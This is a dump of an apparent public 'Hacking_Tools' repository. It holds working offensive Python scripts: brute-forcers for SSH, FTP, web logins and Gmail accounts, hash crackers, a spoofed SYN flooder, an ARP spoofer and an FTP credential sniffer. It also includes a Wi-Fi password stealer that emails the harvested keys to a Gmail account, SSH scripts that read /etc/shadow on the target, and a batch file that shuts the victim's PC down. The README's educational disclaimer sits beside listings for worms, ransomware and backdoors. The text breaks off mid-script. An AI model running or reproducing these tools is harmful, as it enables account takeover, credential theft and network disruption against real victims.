├── .github ├── FUNDING.yml ├── ISSUE_TEMPLATE │ ├── feature_request.md │ └── bug_report.md └── dependabot.yml ├── Msg-encoder-and-decoder ├── .gitkeep ├── Readme.md └── Encoder-Decoder.py ├── Hash_Generator_And_Cracker ├── .gitkeep ├── icons │ ├── .gitkeep │ ├── lock_png_1.png │ └── quit_image.png ├── Readme.md ├── Hash_Cracker_Universal.py └── Hash_Generator_256.java ├── .gitignore ├── SSH_FTP ├── passwords.txt ├── ftp_passwords.txt ├── anonymousLogin.py ├── ftpBrute.py ├── sshlogin.py └── sshBrute.py ├── Password_Cracking ├── md5_passwords.txt ├── crypt_dictionary.txt ├── crypt_passwords.txt ├── hasher.py ├── sha1Hash.py ├── md5Brute.py └── cryptForce.py ├── WEB_Penetration_Testing ├── Password-List.txt ├── directoryDiscover.py ├── gmailBruteforce.py ├── wifipassword.py ├── bruteforce.py └── baseDigestAuth.py ├── Scanner ├── vulnerabilities.txt ├── portscanner.py ├── retrieveBanner.py ├── Log4jScanner │ ├── headers-minimal.txt │ ├── headers.txt │ ├── log4jscanner.py │ └── headers-large.txt ├── vulnerabilityScanner.py └── advancedPortScanner.py ├── Virus ├── Love.bat └── boss.py ├── Flooder-Sniffer-Spoofer ├── synFlooder.py ├── macSniffer.py ├── FTPSniffer.py ├── ArpSpoofer.py └── macChanger.py ├── SECURITY.md ├── README.md ├── Reverse_Shell ├── keylogger.py ├── server.py ├── revbackdoor.py └── commandandcontrol.py ├── Network_Analyzer └── packetAnalyzer.py ├── CODE_OF_CONDUCT.md ├── Worms ├── Pass.py ├── Replicator.py └── Extoter.py ├── DDos └── DERIX.py └── LICENSE /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Msg-encoder-and-decoder/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/icons/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Build folder and log file 2 | build/ 3 | build.log 4 | -------------------------------------------------------------------------------- /SSH_FTP/passwords.txt: -------------------------------------------------------------------------------- 1 | password 2 | abc123 3 | toor 4 | msfadmin 5 | administrator 6 | password 7 | helloworld 8 | -------------------------------------------------------------------------------- /Password_Cracking/md5_passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | root 4 | administrator 5 | Password1 6 | admin123 7 | toor 8 | -------------------------------------------------------------------------------- /Password_Cracking/crypt_dictionary.txt: -------------------------------------------------------------------------------- 1 | password 2 | administrator 3 | Password1 4 | root 5 | qwerty 6 | admin 7 | admin123 8 | -------------------------------------------------------------------------------- /WEB_Penetration_Testing/Password-List.txt: -------------------------------------------------------------------------------- 1 | admin 2 | administrator 3 | password 4 | Password1 5 | qwerty 6 | helloworld 7 | Test1234! 8 | P@w00rd1 9 | -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/icons/lock_png_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Malwareman007/Hacking_Tools/HEAD/Hash_Generator_And_Cracker/icons/lock_png_1.png -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/icons/quit_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Malwareman007/Hacking_Tools/HEAD/Hash_Generator_And_Cracker/icons/quit_image.png -------------------------------------------------------------------------------- /SSH_FTP/ftp_passwords.txt: -------------------------------------------------------------------------------- 1 | admin:administrator 2 | administrator:password 3 | root:toor 4 | root:password 5 | msfadmin:msfadmin 6 | user:abc123 7 | admin:qwerty 8 | user:Password1 9 | -------------------------------------------------------------------------------- /Password_Cracking/crypt_passwords.txt: -------------------------------------------------------------------------------- 1 | administrator:SHA1gRjmWMnwg 2 | admin1:SHLAvMU4ftW0U 3 | root:SHugK1irBntNw 4 | user:SHIXgjjO0E5Lc 5 | toor:SHfiBfNQ4hLP 6 | admin123:SHliYl4p5OyJQ 7 | -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/Readme.md: -------------------------------------------------------------------------------- 1 | # Hash-Cracker 2 | * It include Sha1,MD5,Sha256,Sha224,Sha512,NTLM 3 | ![image](https://user-images.githubusercontent.com/86009160/166123655-865cfd48-c8cf-4bfa-a888-b7a854c9e3b7.png) 4 | -------------------------------------------------------------------------------- /Scanner/vulnerabilities.txt: -------------------------------------------------------------------------------- 1 | randomVulnerability1 2 | SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 3 | randomVulnerability2 4 | 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) 5 | randomVulnerability3 6 | randomVulnerability4 7 | randomVulnerability5 8 | 9 | 10 | -------------------------------------------------------------------------------- /Virus/Love.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | color 57 3 | echo Hey, do you love me (only answer in yes or no) 4 | set /p love= 5 | if %love%==yes goto love 6 | if %love%==no goto hate 7 | :love 8 | echo I love you too... 9 | echo Meet you soon :) 10 | pause 11 | exit 12 | :hate 13 | echo But I love you....hehehehehe 14 | echo You are hacked... 15 | echo Your PC will crash in 10 seconds 16 | timeout 10 17 | shutdown -s -t 100 18 | -------------------------------------------------------------------------------- /SSH_FTP/anonymousLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | import ftplib 5 | 6 | def anonLogin(hostname): 7 | try: 8 | ftp = ftplib.FTP(hostname) 9 | ftp.login('anonymous', 'anonymous') 10 | print('[+] ' + hostname + ' FTP Anonymous Login Successfull') 11 | ftp.quit() 12 | return True 13 | except: 14 | print('[-] ' + hostname + ' FTP Anonymous Login Failed') 15 | return False 16 | 17 | host = input("Enter IP Address to Target: ") 18 | anonLogin(host) 19 | -------------------------------------------------------------------------------- /Scanner/portscanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | from termcolor import colored 5 | 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | socket.setdefaulttimeout(2) 8 | 9 | host = input("[*] Please Specify a Host to Scan: ") 10 | 11 | def portscanner(port): 12 | if sock.connect_ex((host,port)): 13 | print(colored("[-] Port %d is closed" % (port), 'red')) 14 | else: 15 | print(colored("[+] Port %d is open" % (port), 'green')) 16 | 17 | for port in range (1, 1000): 18 | portscanner(port); 19 | -------------------------------------------------------------------------------- /WEB_Penetration_Testing/directoryDiscover.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | 3 | 4 | import requests 5 | 6 | def request(url): 7 | try: 8 | return requests.get("http://" + url) 9 | except requests.exceptions.ConnectionError: 10 | pass 11 | 12 | targetURL = input("Enter Target URL: ") 13 | file = open("common.txt", "r") 14 | for line in file: 15 | line = line.strip('\n') 16 | fullURL = targetURL + "/" + line 17 | response = request(fullURL) 18 | if response: 19 | print('[+] Discovered Directory at Link: ' + fullURL) 20 | -------------------------------------------------------------------------------- /Flooder-Sniffer-Spoofer/synFlooder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from scapy.all import * 4 | 5 | def synFlood(src, target, message, dstPort): 6 | ipLayer = IP(src=src, dst=target) 7 | tcpLayer = TCP(sport=4444, dport=dstPort) 8 | rawLayer = Raw(load=message) 9 | packet = ipLayer/tcpLayer/rawLayer 10 | send(packet) 11 | 12 | src = input("Enter Source IP Address To Fake: ") 13 | target=input("Enter Target's IP Address: ") 14 | message = input("Enter Message FOR TCP Payload: ") 15 | dstPort= int(input("Enter Port to Block: ")) 16 | 17 | while True: 18 | synFlood(src, target, message, dstPort) 19 | -------------------------------------------------------------------------------- /Scanner/retrieveBanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/07/2021 4 | 5 | import socket 6 | 7 | def returnBanner(ip, port): 8 | try: 9 | socket.setdefaulttimeout(2) 10 | s = socket.socket() 11 | s.connect((ip,port)) 12 | banner = s.recv(1024) 13 | return banner 14 | except: 15 | return 16 | 17 | def main(): 18 | ip = raw_input("[*] Enter Target IP to Scan: ") 19 | for port in range(1,100): 20 | banner = returnBanner(ip, port) 21 | if banner: 22 | print "[*]" + ip + ":" + str(port) + " - " + banner.strip('\n') 23 | 24 | main() 25 | 26 | 27 | -------------------------------------------------------------------------------- /WEB_Penetration_Testing/gmailBruteforce.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | 3 | 4 | import smtplib 5 | from termcolor import colored 6 | 7 | smtpServer = smtplib.SMTP("smtp.gmail.com", 587) 8 | smtpServer.ehlo() 9 | smtpServer.starttls() 10 | 11 | user = input("Enter Target Email Address: ") 12 | file = input("Enter Path to Password File: ") 13 | passwordFile = open(file, "r") 14 | 15 | for password in passwordFile: 16 | password = password.strip('\n') 17 | try: 18 | smtpServer.login(user, password) 19 | print(colored('[+] Password Found: %s' % password, "green")) 20 | except smtplib.SMTPAuthenticationError: 21 | print(colored('[-] Wrond Password: %s' % password, "red")) 22 | 23 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security Policy 2 | 3 | ## Supported Versions 4 | 5 | Use this section to tell people about which versions of your project are 6 | currently being supported with security updates. 7 | 8 | | Version | Supported | 9 | | ------- | ------------------ | 10 | | 5.1.x | :white_check_mark: | 11 | | 5.0.x | :x: | 12 | | 4.0.x | :white_check_mark: | 13 | | < 4.0 | :x: | 14 | 15 | ## Reporting a Vulnerability 16 | 17 | Use this section to tell people how to report a vulnerability. 18 | 19 | Tell them where to go, how often they can expect to get an update on a 20 | reported vulnerability, what to expect if the vulnerability is accepted or 21 | declined, etc. 22 | -------------------------------------------------------------------------------- /Password_Cracking/hasher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import hashlib 4 | 5 | hashValue = input('Enter String to Hash: ') 6 | 7 | hashmd5 = hashlib.md5() 8 | hashmd5.update(hashValue.encode()) 9 | print('MD5 Hash: ' + hashmd5.hexdigest()) 10 | 11 | hashsha1 = hashlib.sha1(); 12 | hashsha1.update(hashValue.encode()) 13 | print('SHA1 Hash: ' + hashsha1.hexdigest()) 14 | 15 | hashsha224 = hashlib.sha224() 16 | hashsha224.update(hashValue.encode()) 17 | print('SHA224 Hash: ' + hashsha224.hexdigest()) 18 | 19 | hashsha256 = hashlib.sha256() 20 | hashsha256.update(hashValue.encode()) 21 | print('SHA256 Hash: ' + hashsha256.hexdigest()) 22 | 23 | hashsha512 = hashlib.sha512() 24 | hashsha512.update(hashValue.encode()) 25 | print('SHA512 Hash: ' + hashsha512.hexdigest()) 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hacking_Tools 2 | * All Type Of Tool. 3 | ## Tools you will find here. 4 | --- 5 | * Worms 6 | * Virus 7 | * scanner 8 | * DDos 9 | * Ransomware 10 | * Password Cracking 11 | * Backdoor 12 | * Web Penetration Testing 13 | * Flooder, Sniffer, and Spoofer 14 | * Network Analysis 15 | 16 | ## 🤝 Contributing 17 | 18 | Contributions, issues and feature requests are welcome!
Feel free to check [issues page](https://github.com/Malwareman007/Open_Source_Web-Vulnerability-Scanner-and-Patcher/issues). 19 | 20 | 21 | 22 | ## ❤ Show your support 23 | 24 | Give a ⭐️ if this project helped you! 25 | 26 | 27 | *** 28 | ## THIS IS ONLY FOR PRESENTATION AND EDUCATIONAL PURPOSES. 29 | ## !!! I AM NOT RESPONSIBLE FOR YOU DOING DUMB STUFF. 30 | ## DO NOT USE THIS TO COMMIT CRIME. 31 | -------------------------------------------------------------------------------- /Password_Cracking/sha1Hash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import urllib.request 4 | import hashlib 5 | from colorama import Fore 6 | 7 | sha1hash = input('[*] Enter SHA1 Hash: ') 8 | 9 | passwordList = str(urllib.request.urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt').read(), 'UTF-8') 10 | 11 | for password in passwordList.split('\n'): 12 | hashGuess = hashlib.sha1(bytes(password, 'UTF-8')).hexdigest() 13 | if hashGuess == sha1hash: 14 | print(Fore.GREEN + "[+] Password Found: " + str(password)) 15 | quit() 16 | else: 17 | print(Fore.RED + '[-] Password not found. Trying next password...') 18 | pass 19 | 20 | print("Password Not Found in Password List") 21 | -------------------------------------------------------------------------------- /Password_Cracking/md5Brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from colorama import Fore 4 | import hashlib 5 | 6 | def openFile(wordList): 7 | try: 8 | file = open(wordList, 'r') 9 | return file 10 | except: 11 | print("[-] File Not Found") 12 | quit() 13 | 14 | passwordHash = input('Enter MD5 Hash Value: ') 15 | wordList = input('Enter Path to Password File: ') 16 | file = openFile(wordList) 17 | 18 | for word in file: 19 | print(Fore.YELLOW + '[*] Trying: ' + word.strip('\n')) 20 | encodeWord = word.encode('UTF-8') 21 | md5Hash = hashlib.md5(encodeWord.strip()).hexdigest() 22 | 23 | if md5Hash == passwordHash: 24 | print(Fore.GREEN + '[+] Password Found: ' + word) 25 | exit(0) 26 | else: 27 | pass 28 | 29 | print('[-] Password Not in List') 30 | 31 | -------------------------------------------------------------------------------- /Flooder-Sniffer-Spoofer/macSniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | import socket 5 | from struct import * 6 | 7 | def ethAddress(addr): 8 | ret = "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % (addr[0], addr[1], addr[2], addr[3], addr[4], addr[5]) 9 | return ret 10 | 11 | try: 12 | s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) 13 | except: 14 | print('[-] Error Creating Socket Object') 15 | exit(1) 16 | 17 | while True: 18 | packet = s.recvfrom(65535) 19 | packet = packet[0] 20 | 21 | ethLength = 14 22 | ethHeader = packet[:ethLength] 23 | 24 | ether = unpack('!6s6sH', ethHeader) 25 | ethProtocol = socket.ntohs(ether[2]) 26 | print('[+} Destination MAC: ' + ethAddress(packet[0:6]) + ' | Source MAC: ' + ethAddress(packet[6:12]) + ' | Protocol: ' + str(ethProtocol)) 27 | -------------------------------------------------------------------------------- /WEB_Penetration_Testing/wifipassword.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | 3 | import subprocess 4 | import smtplib 5 | import re 6 | 7 | 8 | command = "netsh wlan show profile" 9 | networks = subprocess.check_output(command, shell=True) 10 | networkList = re.findall('(?:profile\s*:\s)(.*)' , networks) 11 | 12 | finalOutput = "" 13 | for network in networkList: 14 | showKey = "netsh wlan show profile " + network + "key=clear" 15 | oneNetworkResult = subprocess.check_output(showKey, shell=True) 16 | finalOutput += oneNetworkResult 17 | 18 | #Have Output Sent as an Email 19 | server = smtplib.smpt("smtp.gmail.com", 587) 20 | server.starttls() 21 | server.login(email,password) 22 | server.sendmail(email, email, finalOutput) 23 | 24 | #Have Output Saved to File 25 | file = open("wifiPasswords.txt", "w") 26 | file.write(finalOutput) 27 | file.close() 28 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | updates: 2 | # Configuration for Dockerfile 3 | - package-ecosystem: "docker" 4 | directory: "/" 5 | schedule: 6 | interval: "weekly" 7 | # Disable all pull requests for Docker dependencies 8 | open-pull-requests-limit: 0 9 | 10 | # Configuration for npm 11 | - package-ecosystem: "npm" 12 | directory: "/" 13 | schedule: 14 | interval: "daily" 15 | ignore: 16 | # Ignore updates to packages that start with 'aws' 17 | # Wildcards match zero or more arbitrary characters 18 | - dependency-name: "aws*" 19 | # Ignore some updates to the 'express' package 20 | - dependency-name: "express" 21 | # Ignore only new versions for 4.x and 5.x 22 | versions: ["4.x", "5.x"] 23 | # For all packages, ignore all patch updates 24 | - dependency-name: "*" 25 | update-types: ["version-update:semver-patch"] 26 | -------------------------------------------------------------------------------- /WEB_Penetration_Testing/bruteforce.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | 3 | import requests 4 | from termcolor import colored 5 | 6 | def bruteforce(username, url): 7 | for password in passwords: 8 | password = password.strip('\n') 9 | print(colored("Trying Password: %s" % password, "yellow")) 10 | dataDict = {"username":username, "password":password, "Login":"submit"} 11 | response = requests.post(url, data=dataDict) 12 | if b"Login failed" in response.content: 13 | pass 14 | else: 15 | print(colored("[+] Username --> " + username, "green")) 16 | print(colored("[+] Password --> " + password, "green")) 17 | exit() 18 | 19 | page_url = "http://127.0.0.1/dvwa/login.php" 20 | username = input("Enter Username For Specified Page: ") 21 | 22 | with open("passwordList.txt", "r") as passwords: 23 | bruteforce(username, page_url) 24 | 25 | print(colored("[-] Password Not Found in List", "red")) 26 | 27 | -------------------------------------------------------------------------------- /Scanner/Log4jScanner/headers-minimal.txt: -------------------------------------------------------------------------------- 1 | # Security appliances may reset requests when headers are larger then the typical. 2 | Accept-Charset 3 | Accept-Datetime 4 | Accept-Encoding 5 | Accept-Language 6 | Cache-Control 7 | Cookie 8 | DNT 9 | Forwarded 10 | Forwarded-For 11 | Forwarded-For-Ip 12 | Forwarded-Proto 13 | From 14 | Max-Forwards 15 | Origin 16 | Pragma 17 | Referer 18 | True-Client-IP 19 | Upgrade 20 | User-Agent 21 | Via 22 | Warning 23 | X-Api-Version 24 | X-Att-DeviceId 25 | X-Correlation-ID 26 | X-Csrf-Token 27 | X-Do-Not-Track 28 | X-Forwarded 29 | X-Forwarded-By 30 | X-Forwarded-For 31 | X-Forwarded-Host 32 | X-Forwarded-Port 33 | X-Forwarded-Proto 34 | X-Forwarded-Scheme 35 | X-Forwarded-Server 36 | X-Forwarded-Ssl 37 | X-Forward-For 38 | X-From 39 | X-Geoip-Country 40 | X-Http-Destinationurl 41 | X-Http-Host-Override 42 | X-Http-Method 43 | X-Http-Method-Override 44 | X-Hub-Signature 45 | X-If-Unmodified-Since 46 | X-ProxyUser-Ip 47 | X-Requested-With 48 | X-Request-ID 49 | X-UIDH 50 | X-XSRF-TOKEN 51 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /SSH_FTP/ftpBrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | import ftplib 5 | 6 | def bruteLogin(hostname, passwordFile): 7 | try: 8 | file = open(passwordFile, 'r') 9 | except: 10 | print('[-] File Does Not Exist') 11 | 12 | print('[*] Attempting to Login to: ' + hostname + '\n') 13 | for line in file.readlines(): 14 | username = line.split(':')[0].strip('\n') 15 | password = line.split(':')[1].strip('\n') 16 | print('[*] Trying Credentials: ' + username + ' : ' + password) 17 | try: 18 | ftp = ftplib.FTP(hostname) 19 | login = ftp.login(username, password) 20 | print('[+] Login Successful With: ' + username + ' / ' + password) 21 | ftp.quit() 22 | return(username, password) 23 | except: 24 | pass 25 | print('[-] Password Not In List') 26 | 27 | host = input("[*] Enter Host to Target: ") 28 | passwordFile = input('[*] Enter User/Password File Path: ') 29 | bruteLogin(host, passwordFile) 30 | -------------------------------------------------------------------------------- /Password_Cracking/cryptForce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import crypt 4 | from colorama import Fore 5 | 6 | def crackPassword(username, password): 7 | salt = password[0:2] 8 | dictionary = open('crypt_dictionary.txt', 'r') 9 | for word in dictionary: 10 | word = word.strip('\n') 11 | cryptPassword = crypt.crypt(word, salt) 12 | if password == cryptPassword: 13 | print(Fore.GREEN + '[+] Found Password\t\t\t' + username + ' : ' + word) 14 | return 15 | print(Fore.RED + '[-] Unable to Crack Password For:\t' + username) 16 | 17 | def main(): 18 | try: 19 | passwordFile = open('crypt_passwords.txt', 'r') 20 | except: 21 | print('[-] File Not Found') 22 | quit() 23 | for line in passwordFile.readlines(): 24 | username = line.split(':')[0] 25 | password = line.split(':')[1].strip('\n') 26 | #print(Fore.RED + '[*] Cracking Password For: ' + username) 27 | crackPassword(username, password) 28 | 29 | 30 | main() 31 | -------------------------------------------------------------------------------- /Flooder-Sniffer-Spoofer/FTPSniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import optparse 4 | from scapy.all import * 5 | 6 | def ftpSniff(packet): 7 | dest = packet.getlayer(IP).dst 8 | raw = packet.sprintf('%Raw.load%') 9 | user = re.findall('(?i)USER (.*)' , raw) 10 | password = re.findall('(?i)PASS (.*)', raw) 11 | 12 | if user: 13 | print('[!] Detected FTP Login To: ' + str(dest)) 14 | print('[+] User: ' + str(user[0]).strip('\r\n')) 15 | elif password: 16 | print('[+] Password: ' + str(password[0]).strip('\r\n')) 17 | 18 | def main(): 19 | parser = optparse.OptionParser('Usage: ' +\ 20 | '-i ') 21 | parser.add_option('-i', dest='interface', \ 22 | type='string', help='Specify Interface to Listen On') 23 | (options,args) = parser.parse_args() 24 | if options.interface == None: 25 | print(parser.usage) 26 | exit(1) 27 | else: 28 | conf.iface = options.interface 29 | 30 | try: 31 | sniff(filter='tcp port 21', prn=ftpSniff) 32 | except KeyboardInterrupt: 33 | print('[!] Program Interrupted') 34 | exit(1) 35 | 36 | main() 37 | -------------------------------------------------------------------------------- /Flooder-Sniffer-Spoofer/ArpSpoofer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from scapy.all import * 4 | 5 | def restore(dstIP, srcIP): 6 | dstMAC = getTargetMac(dstIP) 7 | srcMAC = getTargetMac(srcIP) 8 | packet = scapy.ARP(op=2, pdst=dstIP, hwdst=dstMAC, psrc=srcIP, hwsrc=srcMAC) 9 | scapy.send(packet, verbose=False) 10 | return 11 | 12 | def getTargetMac(ip): 13 | arp_request = scapy.ARP(pdst=ip) 14 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 15 | finalPacket = broadcast/arp_request 16 | answer = scapy.srp(finalPacket, timeout=2, verbose=False)[0] 17 | mac = answer[0][1].hwsrc 18 | return(mac) 19 | 20 | 21 | def spoof_arp(target_ip, spoofed_ip): 22 | mac = getTargetMac(target_ip) 23 | packet = scapy.ARP(op=2, hwdst=mac, pdst=target_ip, psrc=spoofed_ip) 24 | scapy.send(packet, verbose=False) 25 | return 26 | 27 | def main(): 28 | try: 29 | while True: 30 | for i in range (1, 255): 31 | spoof_arp("Target_IP", "Source_IP") 32 | except KeyboardInterrupt: 33 | print("[!] Program Interrupted") 34 | restore("Target_IP", "Source_IP") 35 | exit(0) 36 | 37 | main() 38 | -------------------------------------------------------------------------------- /SSH_FTP/sshlogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import pexpect 4 | 5 | PROMPT = ['# ', '>>> ', '> ', '\$ ', '$ '] 6 | 7 | def send_command(connection, command): 8 | connection.sendline(command) 9 | connection.expect(PROMPT) 10 | print(connection.before.decode()) 11 | 12 | def connect(user, host, password): 13 | ssh_newkey = 'Are you sure you want to continue connecting' 14 | connString = 'ssh ' + user + '@' + host 15 | spawn = pexpect.spawn(connString) 16 | ret = spawn.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: ']) 17 | if ret == 0: 18 | print('[-] Error Connecting') 19 | return 20 | 21 | if ret == 1: 22 | spawn.sendline('Yes') 23 | ret = spawn.expcet([pexpect.TIMEOUT, '[P|p]assword: ']) 24 | if ret == 0: 25 | print('[-] Error Connecting') 26 | return 27 | spawn.sendline(password) 28 | spawn.expect(PROMPT) 29 | return spawn 30 | 31 | def main(): 32 | host = input("Enter Host to Target: ") 33 | user = input("Enter SSH Username: ") 34 | password = input("Enter SSH Password: ") 35 | shell = connect(user, host, password) 36 | send_command(shell, 'cat /etc/shadow | grep root;ps') 37 | 38 | main() 39 | -------------------------------------------------------------------------------- /Scanner/Log4jScanner/headers.txt: -------------------------------------------------------------------------------- 1 | Accept-Charset 2 | Accept-Datetime 3 | Accept-Encoding 4 | Accept-Language 5 | Cache-Control 6 | Cookie 7 | DNT 8 | Forwarded 9 | Forwarded-For 10 | Forwarded-For-Ip 11 | Forwarded-Proto 12 | From 13 | Max-Forwards 14 | Origin 15 | Pragma 16 | Referer 17 | TE 18 | True-Client-IP 19 | Upgrade 20 | User-Agent 21 | Via 22 | Warning 23 | X-Api-Version 24 | X-Att-Deviceid 25 | X-ATT-DeviceId 26 | X-Correlation-ID 27 | X-Csrf-Token 28 | X-CSRFToken 29 | X-Do-Not-Track 30 | X-Foo 31 | X-Foo-Bar 32 | X-Forwarded 33 | X-Forwarded-By 34 | X-Forwarded-For 35 | X-Forwarded-For-Original 36 | X-Forwarded-Host 37 | X-Forwarded-Port 38 | X-Forwarded-Proto 39 | X-Forwarded-Protocol 40 | X-Forwarded-Scheme 41 | X-Forwarded-Server 42 | X-Forwarded-Ssl 43 | X-Forwarder-For 44 | X-Forward-For 45 | X-Forward-Proto 46 | X-Frame-Options 47 | X-From 48 | X-Geoip-Country 49 | X-Http-Destinationurl 50 | X-Http-Host-Override 51 | X-Http-Method 52 | X-Http-Method-Override 53 | X-HTTP-Method-Override 54 | X-Http-Path-Override 55 | X-Https 56 | X-Htx-Agent 57 | X-Hub-Signature 58 | X-If-Unmodified-Since 59 | X-Imbo-Test-Config 60 | X-Insight 61 | X-Ip 62 | X-Ip-Trail 63 | X-ProxyUser-Ip 64 | X-Requested-With 65 | X-Request-ID 66 | X-UIDH 67 | X-Wap-Profile 68 | X-XSRF-TOKEN 69 | -------------------------------------------------------------------------------- /Scanner/vulnerabilityScanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | def retrieveBanner(ip, port): 8 | try: 9 | socket.setdefaulttimeout(2) 10 | sock = socket.socket() 11 | sock.connect((ip,port)) 12 | banner = sock.recv(1024) 13 | return str(banner) 14 | except: 15 | return 16 | 17 | def checkVulnerabilities(banner, filename): 18 | file = open(filename, "r") 19 | for line in file.readlines(): 20 | if line.strip("\n") in banner: 21 | print ('[+] Server has vulnerability: ' + banner.strip("\n")) 22 | return 23 | 24 | def main(): 25 | if len(sys.argv) == 2: 26 | filename = sys.argv[1] 27 | if not os.path.isfile(filename): 28 | print ('[-] File Does Not Exist') 29 | exit(0) 30 | if not os.access(filename, os.R_OK): 31 | print ('[-] Access Denied') 32 | exit(0) 33 | else: 34 | print ('[-] Usage: ' + str(sys.argv[0]) + " ") 35 | exit(0) 36 | 37 | portlist = [20, 21, 22, 25, 443, 3389] #Ports to Test 38 | for x in range(4,7): #SPECIFY RANGE OF IPs TO TEST 39 | ip = "192.168.7.10" + str(x) 40 | print('------ Scanning ' + ip + ' ------') 41 | for port in portlist: 42 | banner = retrieveBanner(ip,port) 43 | if banner: 44 | checkVulnerabilities(banner, filename) 45 | main() 46 | -------------------------------------------------------------------------------- /SSH_FTP/sshBrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import pexpect 4 | from colorama import Fore 5 | 6 | PROMPT = ['# ', '>>> ', '> ', '\$ ', '$ '] 7 | 8 | def send_command(connection, command): 9 | connection.sendline(command) 10 | connection.expect(PROMPT) 11 | print(connection.before.decode()) 12 | 13 | def connect(user, host, password): 14 | ssh_newkey = 'Are you sure you want to continue connecting' 15 | connString = 'ssh ' + user + '@' + host 16 | spawn = pexpect.spawn(connString) 17 | ret = spawn.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: ']) 18 | if ret == 0: 19 | print('[-] Error Connecting') 20 | return 21 | 22 | if ret == 1: 23 | spawn.sendline('Yes') 24 | ret = spawn.expcet([pexpect.TIMEOUT, '[P|p]assword: ']) 25 | if ret == 0: 26 | print('[-] Error Connecting') 27 | return 28 | spawn.sendline(password) 29 | spawn.expect(PROMPT, timeout=0.1) 30 | return spawn 31 | 32 | def main(): 33 | host = input("Enter IP address of Target to Bruteforce: ") 34 | user = input("Enter User Account to Bruteforce: ") 35 | file = open('passwords.txt', 'r') 36 | for password in file.readlines(): 37 | password = password.strip('\n') 38 | try: 39 | spawn = connect(user, host, password) 40 | print(Fore.GREEN + '[+] Password Found: ' + password) 41 | send_command(spawn, 'cat /etc/shadow') 42 | except: 43 | 